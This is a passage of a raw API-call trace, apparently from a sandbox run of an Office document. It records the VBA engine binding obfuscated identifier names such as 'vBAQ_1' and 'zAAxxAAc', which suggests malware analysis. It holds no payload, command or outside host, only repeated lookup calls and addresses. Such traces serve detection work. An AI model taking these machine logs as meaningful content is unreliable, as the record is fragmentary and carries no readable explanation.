pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0068.983] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61ba2, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="vBAQ_1") returned 7 [0068.983] ITypeComp:RemoteBind (in: This=0x665ba60, szName="vBAQ_1", lHashVal=0x101e85, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.983] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61ba2, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="vBAQ_1") returned 7 [0068.983] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="vBAQ_1", lHashVal=0x101e85, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.983] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61ba2, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="vBAQ_1") returned 7 [0068.983] ITypeComp:RemoteBind (in: This=0x665bd30, szName="vBAQ_1", lHashVal=0x101e85, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.984] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="vBAQ_1") returned 0x101e85 [0068.984] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="vBAQ_1" | out: _Dst="vBAQ_1") returned 0x0 [0068.984] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="vBAQ_1") returned 7 [0068.984] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.984] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="vBAQ_1", lHashVal=0x101e85, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.984] IUnknown:Release (This=0x665ba50) returned 0xd [0068.984] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.984] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="vBAQ_1", lHashVal=0x101e85, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.984] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.984] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.984] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="vBAQ_1", lHashVal=0x101e85, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.984] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.984] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.984] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="vBAQ_1", lHashVal=0x101e85, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.984] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.984] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61ba2, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="vBAQ_1") returned 7 [0068.984] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="vBAQ_1", lHashVal=0x101e85, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.984] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0068.984] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3a61ba2 | out: _Dst=0x67c2d40) returned 0x0 [0068.984] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_vBAQ_1") returned 0x10992e [0068.984] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_vBAQ_1" | out: _Dst="_B_var_vBAQ_1") returned 0x0 [0068.984] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_vBAQ_1") returned 14 [0068.984] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.984] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_vBAQ_1", lHashVal=0x10992e, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.984] IUnknown:Release (This=0x665ba50) returned 0xd [0068.984] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.984] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_vBAQ_1", lHashVal=0x10992e, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.985] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.985] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.985] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_vBAQ_1", lHashVal=0x10992e, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.985] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.985] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.985] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_vBAQ_1", lHashVal=0x10992e, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.985] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.985] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.985] IUnknown:Release (This=0x665ba50) returned 0xd [0068.985] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b107fe, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_vBAQ_1") returned 14 [0068.985] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_vBAQ_1", lHashVal=0x10992e, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x76005f00720061, ppTypeComp=0x5f005100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x76005f00720061, ppTypeComp=0x5f005100000000, pDummy=0x0) returned 0x0 [0068.985] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3a61ba2 | out: _Dst=0x144ec0) returned 0x0 [0068.985] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61c9a, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="SAAQUoA") returned 8 [0068.985] ITypeComp:RemoteBind (in: This=0x665ba60, szName="SAAQUoA", lHashVal=0x10b794, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.985] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61c9a, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="SAAQUoA") returned 8 [0068.985] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="SAAQUoA", lHashVal=0x10b794, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.985] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61c9a, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="SAAQUoA") returned 8 [0068.994] ITypeComp:RemoteBind (in: This=0x665bd30, szName="SAAQUoA", lHashVal=0x10b794, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.995] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="SAAQUoA") returned 0x10b794 [0068.995] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="SAAQUoA" | out: _Dst="SAAQUoA") returned 0x0 [0068.995] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="SAAQUoA") returned 8 [0068.995] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.995] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="SAAQUoA", lHashVal=0x10b794, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.995] IUnknown:Release (This=0x665ba50) returned 0xd [0068.995] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.995] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="SAAQUoA", lHashVal=0x10b794, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.995] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.995] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.995] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="SAAQUoA", lHashVal=0x10b794, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.995] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.995] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.995] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="SAAQUoA", lHashVal=0x10b794, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.995] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.995] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61c9a, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="SAAQUoA") returned 8 [0068.995] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="SAAQUoA", lHashVal=0x10b794, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.995] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0068.995] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3a61c9a | out: _Dst=0x67c2d40) returned 0x0 [0068.995] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_SAAQUoA") returned 0x10bb18 [0068.995] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="DAAGDA", cchCount1=-1, lpString2="_B_var_SAAQUoA", cchCount2=-1) returned 3 [0068.996] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_SAAQUoA" | out: _Dst="_B_var_SAAQUoA") returned 0x0 [0068.996] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_SAAQUoA") returned 15 [0068.996] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.996] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_SAAQUoA", lHashVal=0x10bb18, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.996] IUnknown:Release (This=0x665ba50) returned 0xd [0068.996] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.996] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_SAAQUoA", lHashVal=0x10bb18, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.996] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.996] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.996] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_SAAQUoA", lHashVal=0x10bb18, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.996] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.996] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.996] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_SAAQUoA", lHashVal=0x10bb18, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.996] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.996] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.996] IUnknown:Release (This=0x665ba50) returned 0xd [0068.996] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1082e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_SAAQUoA") returned 15 [0068.996] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_SAAQUoA", lHashVal=0x10bb18, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x53005f00720061, ppTypeComp=0x55005100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x53005f00720061, ppTypeComp=0x55005100000000, pDummy=0x0) returned 0x0 [0068.996] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3a61c9a | out: _Dst=0x144ec0) returned 0x0 [0068.996] ITypeComp:RemoteBind (in: This=0x665ba60, szName="zAAxxAAc", lHashVal=0x10451d, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.996] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61c6e, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="zAAxxAAc") returned 9 [0068.996] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="zAAxxAAc", lHashVal=0x10451d, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.997] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61c6e, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="zAAxxAAc") returned 9 [0068.997] ITypeComp:RemoteBind (in: This=0x665bd30, szName="zAAxxAAc", lHashVal=0x10451d, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.997] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="zAAxxAAc") returned 0x10451d [0068.997] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="zAAxxAAc" | out: _Dst="zAAxxAAc") returned 0x0 [0068.997] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="zAAxxAAc") returned 9 [0068.997] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.997] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="zAAxxAAc", lHashVal=0x10451d, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.997] IUnknown:Release (This=0x665ba50) returned 0xd [0068.997] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.997] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="zAAxxAAc", lHashVal=0x10451d, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.997] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.997] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.997] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="zAAxxAAc", lHashVal=0x10451d, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.997] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.997] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.997] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="zAAxxAAc", lHashVal=0x10451d, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.997] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.997] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61c6e, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="zAAxxAAc") returned 9 [0068.997] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="zAAxxAAc", lHashVal=0x10451d, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.997] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0068.997] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3a61c6e | out: _Dst=0x67c2d40) returned 0x0 [0068.997] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_zAAxxAAc") returned 0x101ca6 [0068.998] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_zAAxxAAc" | out: _Dst="_B_var_zAAxxAAc") returned 0x0 [0068.998] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_zAAxxAAc") returned 16 [0068.998] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.998] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_zAAxxAAc", lHashVal=0x101ca6, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.998] IUnknown:Release (This=0x665ba50) returned 0xd [0068.998] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.998] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_zAAxxAAc", lHashVal=0x101ca6, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.998] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.998] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.998] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_zAAxxAAc", lHashVal=0x101ca6, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.998] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.998] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.998] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_zAAxxAAc", lHashVal=0x101ca6, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.998] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.998] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.998] IUnknown:Release (This=0x665ba50) returned 0xd [0068.998] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1085e, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_zAAxxAAc") returned 16 [0068.998] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_zAAxxAAc", lHashVal=0x101ca6, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x7a005f00720061, ppTypeComp=0x78007800000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x7a005f00720061, ppTypeComp=0x78007800000000, pDummy=0x0) returned 0x0 [0068.998] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3a61c6e | out: _Dst=0x144ec0) returned 0x0 [0068.998] ITypeComp:RemoteBind (in: This=0x665ba60, szName="kBAUxQA", lHashVal=0x100692, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.998] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61cc2, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="kBAUxQA") returned 8 [0068.998] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="kBAUxQA", lHashVal=0x100692, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.999] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61cc2, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="kBAUxQA") returned 8 [0068.999] ITypeComp:RemoteBind (in: This=0x665bd30, szName="kBAUxQA", lHashVal=0x100692, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.999] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="kBAUxQA") returned 0x100692 [0068.999] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="kBAUxQA" | out: _Dst="kBAUxQA") returned 0x0 [0068.999] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="kBAUxQA") returned 8 [0068.999] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.999] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="kBAUxQA", lHashVal=0x100692, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.999] IUnknown:Release (This=0x665ba50) returned 0xd [0068.999] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.999] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="kBAUxQA", lHashVal=0x100692, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.999] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.999] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.999] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="kBAUxQA", lHashVal=0x100692, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.999] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.999] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.999] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="kBAUxQA", lHashVal=0x100692, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.999] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.999] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61cc2, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="kBAUxQA") returned 8 [0068.999] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="kBAUxQA", lHashVal=0x100692, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.999] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0068.999] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3a61cc2 | out: _Dst=0x67c2d40) returned 0x0 [0068.999] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_kBAUxQA") returned 0x10fad4 [0068.999] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_kBAUxQA" | out: _Dst="_B_var_kBAUxQA") returned 0x0 [0068.999] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_kBAUxQA") 